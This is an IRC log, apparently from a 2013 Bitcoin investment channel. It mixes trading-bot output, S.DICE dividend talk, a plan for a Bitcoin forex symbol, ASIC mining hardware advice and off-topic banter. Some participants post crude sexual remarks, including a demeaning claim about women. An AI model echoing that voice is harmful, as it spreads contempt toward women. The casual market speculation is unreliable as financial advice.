now" Mar 03 03:57:14 so i dont understand the problem Mar 03 03:57:23 why they cant buy bitcoins using their coporate accounts Mar 03 03:57:33 well Mar 03 03:57:36 lets go through it Mar 03 03:57:46 of course they have no way of sending an electronic order Mar 03 03:57:50 so let's say they call me Mar 03 03:57:53 because they trust me Mar 03 03:57:59 or do an order via your site Mar 03 03:58:04 if you had a live chat option like i do Mar 03 03:58:07 and say hey, i wanna get 1000 btc right now, what kind of price am i looking at? Mar 03 03:58:22 let's assume i actually had the market data to tell them Mar 03 03:58:30 looking at all the exchanges and finding the best price Mar 03 03:58:30 okey Mar 03 03:58:36 ok, i wanna buy it Mar 03 03:58:41 give me the money Mar 03 03:58:42 it would probably just be based on mtgox price Mar 03 03:58:58 ok, well, i have to wire the money out of my account, and then i have to wire you the money Mar 03 03:59:09 ok see you in 5 days then Mar 03 03:59:16 see the problem? Mar 03 03:59:17 you cant float it for him? Mar 03 03:59:23 i suppose i could Mar 03 03:59:29 lul Mar 03 03:59:32 but not at that amount Mar 03 03:59:40 and not in any way that would make me money Mar 03 03:59:58 the point is to be able to use the existing accounts so i don't hve to worry about their funding Mar 03 04:00:01 start off baby steps Mar 03 04:00:08 start with 1000 dollar limit maybe Mar 03 04:00:09 since funding is always the worst part of bitcoin trading Mar 03 04:00:31 mt. gox...10+ days to verify using dwolla Mar 03 04:00:43 let me tell you a secret Mar 03 04:00:56 i buy outside of mtgox and its always cheaper than the current market price at that time Mar 03 04:01:00 and again, they just did a trade with their own money and it didn't really relate to their job at all Mar 03 04:01:09 yeah of course Mar 03 04:01:18 but speed is the key here Mar 03 04:01:31 and also, your P&L will show your account Mar 03 04:01:44 not what you do with some person outside of the system Mar 03 04:02:16 ie. you want to have this be a trade done as part of their profession, not as a side job or something Mar 03 04:02:24 you need direct relationships with miners Mar 03 04:02:27 true Mar 03 04:02:36 that is the synergy with the fpga project i have going on Mar 03 04:02:38 or set up a seperate branch to your company that's strickly a bitcoin mining company Mar 03 04:02:45 if i can get the equivalent of half an avalon Mar 03 04:02:51 it'll be a nice little start Mar 03 04:03:01 but suffice it to say Mar 03 04:03:01 and you can start writing off equipment and electricity against your bitcoin mining company Mar 03 04:03:13 lol, no cost equipment or electricity Mar 03 04:03:23 but yeah Mar 03 04:03:25 i see your point Mar 03 04:03:32 what i am planning on doing Mar 03 04:03:37 and what we are working on Mar 03 04:03:51 is a symbol on a platform where people already trade dollars, euros, pounds and yen Mar 03 04:04:03 so now it is dollars, euros, pounds yen and bitcoins Mar 03 04:04:28 ie. i don't have to worry abourt your funding, or settlement, i just worry about executing orders against the bitcoin exchanges Mar 03 04:04:32 and collecting fees Mar 03 04:05:00 sounds good Mar 03 04:05:02 I'm taking preorders for bitcoin beer. Mar 03 04:05:03 their forex company, who has said they are interested, would take care of the accounts, but they would offer one more symbol for their traders Mar 03 04:05:06 so you're actually working on software? Mar 03 04:05:20 we have a top tier software system in place Mar 03 04:05:22 lol Mar 03 04:05:43 my boss at my day job called it "a ferrari on a dirt road" lol Mar 03 04:05:54 haha nice Mar 03 04:06:06 sounds good and a bit crazy what you're doing, keep my updated :) Mar 03 04:06:07 me Mar 03 04:06:38 yeah, but it basically would have like a matching engine so say account #25671 wants to buy and account #12543 wants to sell, it can match them internally, saving us the fees from mt. gox or wherever Mar 03 04:06:43 that is internalization Mar 03 04:07:02 with 30k accounts...we can prob do quite a bit of internalization Mar 03 04:07:25 and with volume, we can lower our rates at gox, and cut better deals with others Mar 03 04:07:42 just you know whatever you do, don't let those guys ruin bitcoin hey? Mar 03 04:07:49 of course not Mar 03 04:07:56 i want them to see this as an introduction Mar 03 04:08:01 so they start using it in everyday life Mar 03 04:08:13 AND, if it works, get interviewed on CNBC Mar 03 04:08:14 lol Mar 03 04:08:18 :) Mar 03 04:08:19 and that day Mar 03 04:08:28 my little boutique tiny hedge fund will post some amazing gains Mar 03 04:08:30 how far off are you? Mar 03 04:08:33 1 year? Mar 03 04:08:46 well...not sure, we got the software and the servers and the location Mar 03 04:09:11 my partner/boss is meeting with those guys for our company (day job) but also selling them on this idea (our own side thing) Mar 03 04:09:16 based in the usa? Mar 03 04:09:20 NYC Mar 03 04:09:33 so, if our deal goes through Mar 03 04:09:35 yeah of course heh nyc exchange Mar 03 04:09:39 for my day job Mar 03 04:09:48 it is fairly reasonable odds that this other thing goes through Mar 03 04:09:59 providing we can deliver a stable good source of liquidity to them Mar 03 04:10:11 so i am mostly working on that right now Mar 03 04:10:33 i think its probably 50/50 at best that it'd done in a year Mar 03 04:10:33 what's your idea of liquidity ? Mar 03 04:10:47 depends, i am not exactly sure what the demand would be Mar 03 04:11:04 i'm still a startup myself trying to figure this stuff out, based in Australia / Asia check us out sometime - bithub.asia bithub.com.au bithub.biz Mar 03 04:11:45 but ideally, they could move large amounts of money relatively quickly and without too much slippage Mar 03 04:12:00 very cool BitHub Mar 03 04:12:15 i'm definitely hoping to partner with people in some way or another in the future Mar 03 04:12:22 if they can provide access to markets Mar 03 04:12:46 i would really like to work with bitfloor since they are NYC based, but i would like to have routes everywhere Mar 03 04:12:48 [BTCTC] [COGNITIVE] 6 @ 0.3 = 1.8 BTC [+] Mar 03 04:13:17 also i could hopefully leave orders on bitfloors books to get liquidity rebates Mar 03 04:14:03 [BTCTC] [GSDPT] 250 @ 0.006296 = 1.574 BTC [-] Mar 03 04:14:48 btw does anyone have any of those ASICMINER shares? Mar 03 04:15:04 here someone was offering just few hrs ago Mar 03 04:15:23 Selling up to 100 ASICMINER shares, pm me with offers. Mar 03 04:15:51 darn Mar 03 04:15:56 i missed that Mar 03 04:16:00 actually talked to him too Mar 03 04:16:08 i would love to pick up some Mar 03 04:16:42 lol whats funny is that that company is more like a private equity thing than public company Mar 03 04:16:55 people always making back room deals and stuff Mar 03 04:16:56 http://trilema.com/2013/bitbet-february-2013-statement/ Mar 03 04:17:00 updated with nice graph Mar 03 04:17:59 mjr i'm all about partnering up and collaboration if you want help or access to australian/asian markets in the future, lets hook it up :) Mar 03 04:18:36 k guys gotta run Mar 03 04:18:38 def Mar 03 04:18:45 good talking to you all Mar 03 04:18:52 best channel on IRC bar none Mar 03 04:23:46 jurov for my curiosity, the guy on reddit that "couldn't waiot" till another nonfee exchange opened **** ENDING LOGGING AT Sun Mar 3 04:23:48 2013 **** BEGIN LOGGING AT Sun Mar 3 04:23:57 2013 Mar 03 04:24:03 and then got all excited about coinbr Mar 03 04:24:09 did he perchance actually make an account ? Mar 03 04:24:37 maybe, he did not let me know Mar 03 04:25:56 twitter "Why do the same people that say A baby in the womb is not life Say bacteria is considered "life" on Mars?" Mar 03 04:26:06 me "Because there's plenty of wombs and scarcely any bacteria on Mars. Abundance cheapens." Mar 03 04:26:46 http://1.bp.blogspot.com/_kC5MT2r5U8s/TBk0BAwNKkI/AAAAAAAAPLw/5wYilxC2V2c/s1600/nuke+explosion.jpg Mar 03 04:33:54 [BTCTC] [COGNITIVE] 2 @ 0.3 = 0.6 BTC [+] Mar 03 04:41:40 [BTCTC] [S.DICE-PT] 24 @ 0.00643 = 0.1543 BTC [+] Mar 03 04:42:24 ^ lol Mar 03 04:48:33 [BTCTC] [BASIC-MINING] 1 @ 0.34 BTC [-] Mar 03 05:08:38 [MPEX] [S.DICE] 1000 @ 0.00580008 = 5.8001 BTC [-] Mar 03 05:08:39 [MPEX] [S.DICE] 500 @ 0.00580007 = 2.9 BTC [-] Mar 03 05:08:41 [MPEX] [S.DICE] 500 @ 0.00580006 = 2.9 BTC [-] Mar 03 05:08:49 [MPEX] [S.DICE] 38 @ 0.00580004 = 0.2204 BTC [-] Mar 03 05:08:51 [MPEX] [S.DICE] 500 @ 0.00580004 = 2.9 BTC [-] Mar 03 05:08:52 [MPEX] [S.DICE] 2000 @ 0.00580002 = 11.6 BTC [-] Mar 03 05:08:54 [MPEX] [S.DICE] 5000 @ 0.00580002 = 29.0001 BTC [-] Mar 03 05:08:54 [MPEX] [S.DICE] 2000 @ 0.00577614 = 11.5523 BTC [-] Mar 03 05:08:55 [MPEX] [S.DICE] 2000 @ 0.00569655 = 11.3931 BTC [-] Mar 03 05:08:57 [MPEX] [S.DICE] 1000 @ 0.00550002 = 5.5 BTC [-] Mar 03 05:08:58 [MPEX] [S.DICE] 50 @ 0.0055 = 0.275 BTC [-] Mar 03 05:10:49 hmmm Mar 03 05:11:22 maybe that ian baked got some shares to sell Mar 03 05:11:36 lol Mar 03 05:11:57 .0055 pre div is pretty nice Mar 03 05:12:08 wish I had a bid up Mar 03 05:15:57 kakobrekla: he wants a large price :) Mar 03 05:16:09 hm? Mar 03 05:16:12 ian Mar 03 05:16:22 how much does he want? Mar 03 05:16:44 was very high is what I was told Mar 03 05:17:37 no number? Mar 03 05:17:47 http://shrani.si/f/l/uy/1RdE4K2G/sdice.png Mar 03 05:18:43 [MPEX] [S.MPOE] 10000 @ 0.00077011 = 7.7011 BTC [+] Mar 03 05:18:44 [MPEX] [S.MPOE] 500 @ 0.00077012 = 0.3851 BTC [+] Mar 03 05:19:28 [MPEX] [S.DICE] 400 @ 0.0055 = 2.2 BTC [-] Mar 03 05:19:57 Ukto Mar 03 05:19:59 You stole my coins Mar 03 05:20:03 0,o Mar 03 05:20:04 ;;getrating Ukto Mar 03 05:20:04 WARNING: Currently not authenticated. User Ukto, rated since Tue Jun 14 21:24:56 2011. Cumulative rating 17, from 12 total ratings. Received ratings: 12 positive, 0 negative. Sent ratings: 2 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=Ukto Mar 03 05:20:12 I deed? Mar 03 05:20:15 jkjk Mar 03 05:21:10 hehe Mar 03 05:22:54 [MPEX] [S.MPOE] 1900 @ 0.00076144 = 1.4467 BTC [-] Mar 03 05:35:39 [MPEX] [S.DICE] 100 @ 0.0055 = 0.55 BTC [-] Mar 03 05:35:40 [MPEX] [S.DICE] 2000 @ 0.00500051 = 10.001 BTC [-] Mar 03 05:35:42 [MPEX] [S.DICE] 23879 @ 0.0050005 = 119.4069 BTC [-] Mar 03 05:35:54 hehe Mar 03 05:35:55 YES Mar 03 05:36:02 [MPEX] [S.DICE] 600 @ 0.0055 = 3.3 BTC [+] Mar 03 05:36:05 why yes? Mar 03 05:36:12 my bid got hit Mar 03 05:36:16 ah Mar 03 05:36:39 [MPEX] [S.DICE] 100 @ 0.0055 = 0.55 BTC [+] Mar 03 05:36:41 [MPEX] [S.DICE] 16121 @ 0.0050005 = 80.6131 BTC [-] Mar 03 05:36:43 [MPEX] [S.DICE] 300 @ 0.00500002 = 1.5 BTC [-] Mar 03 05:36:43 [MPEX] [S.DICE] 400 @ 0.00500001 = 2 BTC [-] Mar 03 05:36:54 when do S.DICE divs come out? Mar 03 05:37:02 soon Mar 03 05:37:38 [MPEX] [S.DICE] 40000 @ 0.0050005 = 200.02 BTC [+] Mar 03 05:37:47 [MPEX] [S.DICE] 1000 @ 0.00500002 = 5 BTC [-] Mar 03 05:37:52 oh shyt Mar 03 05:38:01 that's a lot of movement Mar 03 05:38:09 !ticker m s.dice Mar 03 05:38:11 [MPEX:S.DICE] 1D: 0.00500001 / 0.00529899 / 0.0063777 (116945 shares, 619.69 BTC), 7D: 0.00500001 / 0.00595337 / 0.0063799 (353812 shares, 2,106.38 BTC), 30D: 0.0042 / 0.0060038 / 0.007395 (6898878 shares, 41,419.50 BTC) Mar 03 05:38:24 I'm out of powder Mar 03 05:38:34 just don't run out of bugs Mar 03 05:38:41 lol Mar 03 05:38:56 will it actually dump below .005? Mar 03 05:39:12 http://shrani.si/f/k/IK/1ptRixZ7/sdice.png Mar 03 05:39:21 its fun to watch rt :) Mar 03 05:39:22 Even with no whale, I think S.DICE is worth .005 Mar 03 05:39:39 pts are missing out lol Mar 03 05:39:40 at least mpex is not closed on the weekend, right pizzaman1337 ;) Mar 03 05:39:58 kakobrekla: yeah, rest of the world is closed Mar 03 05:40:01 ;;calc .000133/.005 Mar 03 05:40:01 0.0266 Mar 03 05:40:59 is that what percentage the dividend will be if the price is at 5? Mar 03 05:41:23 yes Mar 03 05:41:42 I also believe that the whale lives Mar 03 05:42:01 with a different address allocation strategy Mar 03 05:42:28 remarkably sparse book on s.dice Mar 03 05:42:46 0.00637769 64`615 / 13`131 0.00444440 Mar 03 05:42:46 [MPEX] [S.DICE] 100 @ 0.00500001 = 0.5 BTC [-] Mar 03 05:42:47 [MPEX] [S.DICE] 1900 @ 0.00500001 = 9.5 BTC [-] Mar 03 05:42:55 damn Mar 03 05:43:00 need more coins Mar 03 05:43:11 don't we all Mar 03 05:43:11 someone really wants to dump a big load Mar 03 05:43:19 but not below .005 Mar 03 05:43:33 aha Mar 03 05:43:45 the 637k ask wall is gone Mar 03 05:43:46 ya seems like someone putting in a wall at 50 would prolly get a good chunk Mar 03 05:43:49 must be that guy Mar 03 05:43:53 mircea_popescu: "How you gonna choke a legend ? You don't think I want to choke people ? You can't just choke all your problems, it takes hard work. If I had my way, I'd never work. I could stay home all day watch Scarface 50 times, eat a turkey sandwich and have sex all fuckin day. Then I'd dress up like a clown and surprise kids at schools. Then I'd take a dump in the back of a movie theater and just wait til s Mar 03 05:44:08 yup Mar 03 05:44:21 [HAVELOCK] [SDICE] 4 @ 0.66 = 2.64 BTC [-] Mar 03 05:44:21 I'm gonna be sad if he drops to .004 Mar 03 05:44:26 [MPEX] [S.MPOE] 4537 @ 0.00077012 = 3.494 BTC [+] Mar 03 05:44:28 [MPEX] [S.MPOE] 5963 @ 0.00077014 = 4.5923 BTC [+] Mar 03 05:44:33 [MPEX] [S.DICE] 100 @ 0.00500001 = 0.5 BTC [-] Mar 03 05:44:39 quick someone by the fucking x.idiff.mar Mar 03 05:44:39 [MPEX] [S.DICE] 1900 @ 0.00500001 = 9.5 BTC [-] Mar 03 05:44:49 I'm selling for fucking .0599 Mar 03 05:44:54 a steal Mar 03 05:44:55 what's your X.IDIFF priced? Mar 03 05:45:06 how;'s it gonna get to 6mn ?! Mar 03 05:45:12 it has one retarget till then, and it's not going up 200% Mar 03 05:45:20 [HAVELOCK] [SDICE] 1 @ 0.6431 BTC [-] Mar 03 05:45:23 SHUT UP Mar 03 05:45:25 !! Mar 03 05:45:25 lol Mar 03 05:45:32 It could retarget twice Mar 03 05:45:45 if the hash rate really ramps up Mar 03 05:45:45 well sure, if we go to like 50 Ph Mar 03 05:45:55 only really needs to double Mar 03 05:46:06 right after next diff Mar 03 05:46:17 next diff is in like 2 weeks-ish Mar 03 05:46:50 yes Mar 03 05:46:52 ;;estimate Mar 03 05:46:53 Next difficulty estimate | 4555697.65506 based on data since last change | 4400318.08082 based on data for last three days Mar 03 05:46:53 Mar 14 Mar 03 05:46:54 [MPEX] [S.DICE] 100 @ 0.00500001 = 0.5 BTC [-] Mar 03 05:46:55 [MPEX] [S.DICE] 1900 @ 0.00500001 = 9.5 BTC [-] Mar 03 05:46:59 oh fuk Mar 03 05:47:03 ;;nextdiff Mar 03 05:47:03 Error: "nextdiff" is not a valid command. Mar 03 05:47:23 he is gonna dump Mar 03 05:47:27 I can feel it Mar 03 05:47:28 no Mar 03 05:47:35 dude leave 100 shares Mar 03 05:47:37 leaves Mar 03 05:47:39 each time Mar 03 05:47:40 lol Mar 03 05:47:48 at 5 Mar 03 05:48:10 well maybe he is going to lose patience Mar 03 05:48:15 lets get ready or smth Mar 03 05:48:24 back to .00008 Mar 03 05:48:28 or w/e da fguck it was Mar 03 05:49:20 [HAVELOCK] [SDICE] 1 @ 0.643 BTC [-] Mar 03 05:49:21 [HAVELOCK] [SDICE] 2 @ 0.642001 = 1.284 BTC [-] Mar 03 05:50:31 let's have some fun, I put 1 S.DICE buy on the book... maybe he'll take it :) Mar 03 05:50:52 [MPEX] [S.DICE] 1 @ 0.00500001 BTC [-] Mar 03 05:51:01 im setting a few Mar 03 05:51:02 [MPEX] [S.DICE] 99 @ 0.00500001 = 0.495 BTC [-] Mar 03 05:51:03 [MPEX] [S.DICE] 1 @ 0.00500001 BTC [-] Mar 03 05:51:04 :D Mar 03 05:51:04 [MPEX] [S.DICE] 900 @ 0.00500001 = 4.5 BTC [-] Mar 03 05:51:11 heh Mar 03 05:51:21 won't go below .005 Mar 03 05:51:28 lets test his will Mar 03 05:51:30 or below 0.00500001 Mar 03 05:51:57 see again he left 100 sitting there Mar 03 05:52:00 hm Mar 03 05:52:04 lets pull a trick Mar 03 05:52:15 that's weird Mar 03 05:52:19 that is botlink Mar 03 05:52:21 botlike Mar 03 05:52:26 nah Mar 03 05:52:32 kakobrekla: is that your 0.00499999? Mar 03 05:52:36 mine Mar 03 05:52:40 :) Mar 03 05:52:54 ;;bc,stats Mar 03 05:52:55 let me try smth see if it works Mar 03 05:52:56 Current Blocks: 223988 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 1803 blocks | Next Difficulty In About: 1 week, 5 days, 0 hours, 28 minutes, and 48 seconds | Next Difficulty Estimate: 4550550.25106 | Estimated Percent Change: 4.18222 Mar 03 05:53:05 wow Mar 03 05:53:23 i wonder if like 20 years from now when s.dice is like better than microsoft Mar 03 05:53:29 500,000 shadow S.DICE shares being sold at .005 Mar 03 05:53:33 people will look back to like, 10k btc pizza moment Mar 03 05:54:30 http://heliacal.net/~solar/bitcoin/pizza/ Mar 03 05:54:34 nobody is keeping track of trades, are they? Besides on twitter Mar 03 05:54:38 [MPEX] [S.DICE] 100 @ 0.00500001 = 0.5 BTC [-] Mar 03 05:54:40 [MPEX] [S.DICE] 400 @ 0.00500001 = 2 BTC [-] Mar 03 05:54:43 oooo Mar 03 05:55:05 tempted to deposit Mar 03 05:55:56 [MPEX] [S.DICE] 100 @ 0.00500001 = 0.5 BTC [-] Mar 03 05:55:58 [MPEX] [S.DICE] 900 @ 0.00500001 = 4.5 BTC [-] Mar 03 05:56:04 fuck Mar 03 05:56:10 wha ? Mar 03 05:56:11 i missed it Mar 03 05:56:23 that cocksucker leaves 100 shares there Mar 03 05:56:26 from the last order Mar 03 05:56:33 i wanted to get mine hit and cancel it Mar 03 05:56:36 before new one comes Mar 03 05:56:39 so there is nothing at 5 Mar 03 05:56:46 was too late Mar 03 05:56:59 somebody placed it after me and mine leftover was hit Mar 03 05:57:05 now someone else has a leftover Mar 03 05:57:24 ok canceled it Mar 03 05:57:25 lol Mar 03 05:57:29 rofl Mar 03 05:57:30 i see Mar 03 05:57:57 now lets see if he drops Mar 03 05:57:58 I wonder if the seller is in this room, watching amused Mar 03 05:58:05 [MPEX] [S.DICE] 400 @ 0.005 = 2 BTC [-] Mar 03 05:58:12 ok time to rollback all trades Mar 03 05:59:00 stop cheating Mar 03 05:59:10 lol Mar 03 05:59:30 my .00499999 gonna get hit? Mar 03 05:59:53 [MPEX] [S.DICE] 1 @ 0.00499999 BTC [-] Mar 03 05:59:57 THERE Mar 03 05:59:58 oh my Mar 03 05:59:59 lol Mar 03 06:00:19 who bought it? Mar 03 06:00:25 SHOW YOURSELF Mar 03 06:00:41 you did? Mar 03 06:00:47 [MPEX] [S.DICE] 1 @ 0.00599993 BTC [+] Mar 03 06:00:50 heheh Mar 03 06:00:53 BOUNCE Mar 03 06:00:56 lol Mar 03 06:01:19 that was the share I bought earlier Mar 03 06:01:20 scalpin the mpex spread with 1sd share Mar 03 06:01:22 profit! :P Mar 03 06:01:26 [MPEX] [S.DICE] 1 @ 0.0048 BTC [-] Mar 03 06:01:29 a Mar 03 06:01:32 now its getting serious Mar 03 06:01:41 [MPEX] [S.DICE] 1 @ 0.00599994 BTC [+] Mar 03 06:01:43 who is trolling Mar 03 06:01:47 lol Mar 03 06:01:49 dudes keep filling my db with bs Mar 03 06:02:01 fuck yo db Mar 03 06:02:03 ima implement the eu tx fee Mar 03 06:02:12 no, that'd be lame Mar 03 06:02:16 except keep the proceeds for buying ho's skimpy outfits Mar 03 06:02:50 you need to distribute those outfits among shareholders Mar 03 06:03:19 prolly wont fit me tho Mar 03 06:04:00 100@0.00500001 Mar 03 06:04:06 im thinking its himself. Mar 03 06:04:13 ha Mar 03 06:04:21 that's a thought, somebody trying to cause a panic to load up Mar 03 06:04:26 most likely Mar 03 06:04:34 nah Mar 03 06:04:38 not a panic Mar 03 06:04:39 right before a div? Mar 03 06:04:42 but the 100 bid Mar 03 06:04:47 ya Mar 03 06:04:55 Bugpowder nah ?! that's exactly what you would say Mar 03 06:04:59 IF YOU WERE DOING IT Mar 03 06:05:01 konspiraci Mar 03 06:05:05 :D Mar 03 06:05:38 I dumped my dice when I figured out no whale Mar 03 06:05:54 also in the news, i ate out today. Mar 03 06:05:55 I bought some back when I found another network of 10,000+ coins Mar 03 06:05:56 it probably is him cause the other 500001's were me and this one isnt Mar 03 06:06:04 law here is you can use receipts for deductions if < 100 lei per. Mar 03 06:06:13 so i told the waitress to split up my bill accordingly. Mar 03 06:06:16 she came up with three things. Mar 03 06:06:20 first was a total of 69 Mar 03 06:06:21 i figured i'll buy at that price and take the div Mar 03 06:06:25 2nd was a total of 69 Mar 03 06:06:29 third was a total of... 69. Mar 03 06:06:49 69 is a restricted number on california license plates Mar 03 06:06:56 only cars from 1969 can use it Mar 03 06:07:01 lol! Mar 03 06:07:23 I learned this today when checking custom plates Mar 03 06:07:39 what you're serious ?! Mar 03 06:09:14 yes Mar 03 06:09:26 [MPEX] [S.DICE] 100 @ 0.00550001 = 0.55 BTC [-] Mar 03 06:09:53 https://www.dmv.ca.gov/ipp2/initPers.do Mar 03 06:09:57 look it up Mar 03 06:10:22 this is why that country is going to shit Mar 03 06:10:26 too many dumbass "rules". Mar 03 06:12:27 Is deprived on IRC? Mar 03 06:16:00 he seems awefully well informed for not being on irc Mar 03 06:16:56 Bugpowder pretty much the only guy with a clue outside of irc Mar 03 06:17:01 ;;seen deprived Mar 03 06:17:05 I have not seen deprived. Mar 03 06:17:13 Deprived doesnt do IRC Mar 03 06:17:15 he does show up ocasionally tho, we've chatted Mar 03 06:17:16 i asked him Mar 03 06:21:58 [BTCTC] [BTC-BOND] 1 @ 0.00996 BTC [-] Mar 03 06:26:41 Deprived knows his shit, runs some great ltc assets Mar 03 06:27:17 DAMN. this one is taken. https://www.dmv.ca.gov/wasapp/ipp2/processPers.do?plateChar0=H&plateChar1=8&plateChar2=S&plateChar3=G&plateChar4=N&plateChar5=H&plateChar6=8 Mar 03 06:29:52 H8SGNH8? Mar 03 06:30:14 try P4NT1E5 Mar 03 06:31:53 Bugpowder: yes, I was going to get H8RSGNH8, but there's a 7 character limit Mar 03 06:32:08 mircea_popescu: I bet that wouldn't be allowed. I mean if they ban 69... Mar 03 06:32:22 wait. panties aren't allowed ? Mar 03 06:32:35 gotta go commando now ? Mar 03 06:32:35 mircea_popescu: dunno. I'm just guessing. Mar 03 06:32:37 there was some dude that had CUN7 or something in west virginia Mar 03 06:32:55 crazy west virginians. Mar 03 06:33:07 it's always west virginians Mar 03 06:33:22 there should be a law all virginians must be named Ian Mar 03 06:33:51 Ian doesn't sound very west virginian Mar 03 06:33:56 Virgin Ian ? Mar 03 06:34:19 haha Mar 03 06:34:23 anyway, what's the big deal, some dork has CUNT on his license plate. so who cares. Mar 03 06:34:47 "yes officer, i saw it, was a pink and green 1971 pontiac with CUNT license plates" Mar 03 06:34:58 http://instantrimshot.com/ Mar 03 06:35:23 it's america so everyone without anything else to do decides they have to care Mar 03 06:35:27 and start a crusade against it Mar 03 06:36:25 sad state of affairs. Mar 03 06:36:30 indeed Mar 03 06:36:40 i blame men. Mar 03 06:36:49 women that don't get fucked often enough and raw enough get bored Mar 03 06:36:57 and a bored woman is the bane of all government. Mar 03 06:37:11 you'd do wonderfully in american politics :) Mar 03 06:37:17 i bet. Mar 03 06:37:30 probably'd get ~50% of the vote Mar 03 06:37:56 as long as i'm counting them i ain't getting under 90 Mar 03 06:38:25 blame it on the hanging chad Mar 03 06:38:48 lol Mar 03 06:39:07 http://www.washingtontimes.com/news/2012/sep/23/where-are-they-now-the-hanging-chad-guy/ Mar 03 06:39:16 anyone have any bets on whom one should bet ~$20k on for asic hardware (actual hardware, not shares)? Mar 03 06:39:57 foregoing the fact that it is still a gamble at this point Mar 03 06:40:15 good question Mar 03 06:40:26 I have a cilent or two who are interested Mar 03 06:40:48 there's no good answer Mar 03 06:40:53 yeah... Mar 03 06:40:55 that's what I said Mar 03 06:41:05 bfl is the most real company i guess Mar 03 06:41:17 asicminer shares might be a stable choice... Mar 03 06:41:22 but all risky Mar 03 06:41:22 If I had $20k to invest in Bitcoin it wouldn't go to any ASIC company Mar 03 06:41:40 runeks: yeah, I said "buy bitcoin, throw some at SDICE but keep most of it in BTC" Mar 03 06:41:53 swhitt http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ http://bitbet.us/bet/269/avalon-will-deliver-asic-devices-before-april-1st/ Mar 03 06:41:55 take your pick Mar 03 06:41:56 swhitt: I think that's good advice. Mar 03 06:41:57 but they are interested in hashing etc. Mar 03 06:42:25 start a litecoin farm Mar 03 06:42:30 thats my advice Mar 03 06:42:40 swhitt: what do you mean? are they interested in making money or supporting the network? Mar 03 06:43:14 what's ltcbtc fx rate now Mar 03 06:43:42 the guy's loaded and wants to geek out Mar 03 06:43:53 plus the prospect of making money makes it more fun I guess Mar 03 06:44:46 1 ltc is only 0.0024 via btc-e now... Mar 03 06:44:59 0.0024 btc Mar 03 06:45:52 look at the usd rate too Mar 03 06:45:57 I have a hard time believing BFL will deliver within the next two months. but on the other hand Avalon won't either, probably (for new customers). so it doesn't look too good. Mar 03 06:46:14 and run a litecoin mining calc befre you judge Mar 03 06:55:02 that was an awesome hockey game Mar 03 06:57:25 was i on tv? Mar 03 07:01:07 musta been Mar 03 07:01:18 missed the s.dice sale 'eh Mar 03 07:02:58 any word from evoorhees lately? Mar 03 07:03:22 when is the march dividend out? Mar 03 07:03:31 i thought it was supposed to be today. Mar 03 07:06:02 complete and accurate Statements of Profit and Loss for each calendar month will be published by them no later than by the fifth day of the new month. Mar 03 07:13:22 [HAVELOCK] [SDICE] 1 @ 0.642 BTC [-] Mar 03 07:14:22 [HAVELOCK] [SDICE] 8 @ 0.64 = 5.12 BTC [-] **** ENDING LOGGING AT Sun Mar 3 07:20:21 2013 **** BEGIN LOGGING AT Sun Mar 3 07:27:31 2013 Mar 03 07:27:55 -NickServ- You failed to identify in time for the nickname mircea_popescu Mar 03 07:38:28 hey guys Mar 03 07:39:40 i cant seem to access my coins Mar 03 07:39:43 via electrum **** ENDING LOGGING AT Sun Mar 3 07:40:38 2013 **** BEGIN LOGGING AT Sun Mar 3 07:41:18 2013 Mar 03 07:41:29 Bowjob why not ? Mar 03 07:41:53 When I double click on the .exe, it doesn't start Mar 03 07:42:01 I'm redownloading electrum to see whats up Mar 03 07:42:02 did you try rebooting Mar 03 07:42:07 yeah Mar 03 07:42:14 <.< Mar 03 07:42:42 I have the seed so I'm good Mar 03 07:43:05 "Electrum is an easy to use Bitcoin client. It protects you from losing coins" Mar 03 07:43:12 i find this funny in the circumstances. Mar 03 07:43:35 does the process show up in the running executables list? Mar 03 07:43:39 No Mar 03 07:43:58 funny, I re downloaded it, doesnt open up Mar 03 07:43:58 mhm Mar 03 07:44:09 what if you try to execute it from the command line, what happens? Mar 03 07:45:21 reboot once again Mar 03 07:50:10 !ticker m s.dice **** BEGIN LOGGING AT Sun Mar 3 16:43:50 2013 Mar 03 16:56:23 [BTCTC] [BTC-TRADING-PT] 1 @ 0.0919 BTC [+] Mar 03 17:01:57 [MPEX] [S.MPOE] 3713 @ 0.00076397 = 2.8366 BTC [-] Mar 03 17:01:59 [MPEX] [S.MPOE] 787 @ 0.00076396 = 0.6012 BTC [-] Mar 03 17:07:49 i hear beer Mar 03 17:07:51 heart Mar 03 17:10:28 http://trilema.com/2012/orice-cuplu-functional/ Mar 03 17:10:30 the text reads Mar 03 17:10:34 "any functional couple... Mar 03 17:10:38 ... includes a little secret" Mar 03 17:34:52 “I really have no idea how money works or budgets work.” Mar 03 17:35:00 that seriously explains everything Mar 03 17:35:08 at least the man's occasionally honest. Mar 03 17:37:01 do you always pat yourself on the back? Mar 03 17:41:50 [BTCTC] [S.MPOE-PT] 500 @ 0.00073 = 0.365 BTC [+] Mar 03 17:44:19 [BTCTC] [BASIC-MINING] 5 @ 0.349 = 1.745 BTC [+] Mar 03 17:45:26 [BTCTC] [BTC-TRADING-PT] 3 @ 0.0919 = 0.2757 BTC [+] Mar 03 17:49:25 [BTCTC] [LTC-MINING] 1 @ 0.398 BTC [+] Mar 03 17:53:04 [BTCTC] [BTC-BOND] 2 @ 0.00999 = 0.02 BTC [+] Mar 03 17:53:10 [BTCTC] [BTC-BOND] 2 @ 0.00999 = 0.02 BTC [+] Mar 03 17:53:12 [BTCTC] [BTC-BOND] 16 @ 0.00999 = 0.1598 BTC [+] Mar 03 17:53:37 mircea_popescu: you have a minute? Mar 03 18:05:36 last saturday john wells had no idea bitcoin even exists. this saturday he's asking his guests cogent questions about it. Mar 03 18:12:29 lol what up everyone Mar 03 18:13:17 this is too funny, every month you have people running away from s.dice's money Mar 03 18:13:29 quick guys they are about to pay us, sell sell sell Mar 03 18:14:23 lol Mar 03 18:16:32 In a mature, efficient market, the stock price generally drops by the amount of the dividend upon dividend payout. Last two months, this anticipated drop did not occur with S.DICE. Mar 03 18:17:03 TO PLAY LOTTO BTC: http://www.lottobtc.com/ Mar 03 18:21:19 Bugpwoder: in fact it went up no? Mar 03 18:32:57 [BTCTC] [BASIC-MINING] 2 @ 0.349 = 0.698 BTC [+] Mar 03 18:33:34 yep Mar 03 18:33:42 in fact it drops right BEFORE dividends Mar 03 18:33:45 then rises after Mar 03 18:34:33 it's because people are trying to short Mar 03 18:34:36 not really Mar 03 18:34:46 -mrmist- [Global Notice] - If you have an old nickserv account with us, please take a few moments to check that you have a valid email listed in /msg 